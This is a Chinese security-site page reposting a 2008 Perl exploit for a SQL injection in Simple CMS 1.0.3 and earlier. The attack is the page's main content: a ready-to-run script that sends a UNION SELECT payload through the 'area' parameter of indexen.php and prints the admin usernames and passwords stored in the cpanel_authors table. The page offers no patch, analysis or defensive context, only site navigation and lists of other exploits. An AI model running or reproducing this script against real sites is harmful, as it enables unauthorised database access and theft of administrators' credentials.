首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit
来源:http://www.spanish-hackers.com 作者:JosS 发布时间:2008-02-17  
#!/usr/bin/perl

# Simple CMS <= 1.0.3 (?area=) Remote SQL Injection Exploit
# Code by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team / Sys - Project
# http://www.spanish-hackers.com
# special thanks to ka0x


print "\t\t########################################################\n\n";
print "\t\t#   Simple CMS <= 1.0.3 Remote SQL Injection Exploit   #\n\n";
print "\t\t#                       by JosS                        #\n\n";
print "\t\t########################################################\n\n";

use strict;
use LWP::UserAgent;

my $victim = $ARGV[0];

if(!$ARGV[0]) {
    print "\n[x] Simple CMS <= 1.0.3 Remote SQL Injection Exploit\n";
    print "[x] written by JosS - sys-project[at]hotmail.com\n";
    print "[x] usage: perl xpl.pl [host]\n";
    print "[x] example: http://localhost/path/\n\n";
    exit(1);
}

    print "\n[+] connecting in $victim...\n";
    my $cnx = LWP::UserAgent->new() or die;
    my $go=$cnx->get($victim."/indexen.php?area=-1+union+select+1,concat(0x5f5f5f5f,0x5b215d20757365723a20,UName,0x20205b215d20706173733a20,PWord,0x5f5f5f5f),3,4,5+from+cpanel_authors/*");
    if ($go->content =~ m/____(.*?)____/ms) {
        print "$1\n";
    } else {
        print "\n[-] exploit failed\n";
    }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AuraCMS 1.62 Multiple Remote S
·DESlock+ <= 3.2.6 DLMFENC.sys
·Joomla Component mediaslide (a
·DESlock+ <= 3.2.6 local kernel
·Microsoft Office .WPS File Sta
·DESlock+ <= 3.2.6 DLMFDISK.sys
·MicroTik RouterOS <= 3.2 SNMPd
·sCssBoard (pwnpack) Multiple V
·Yahoo! JukeBox MediaGrid Activ
·Apple iPhoto 4.0.3 DPAP Server
·Yahoo! Music Jukebox 2.2 AddBu
·X.Org xorg-server <= 1.1.1-48.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved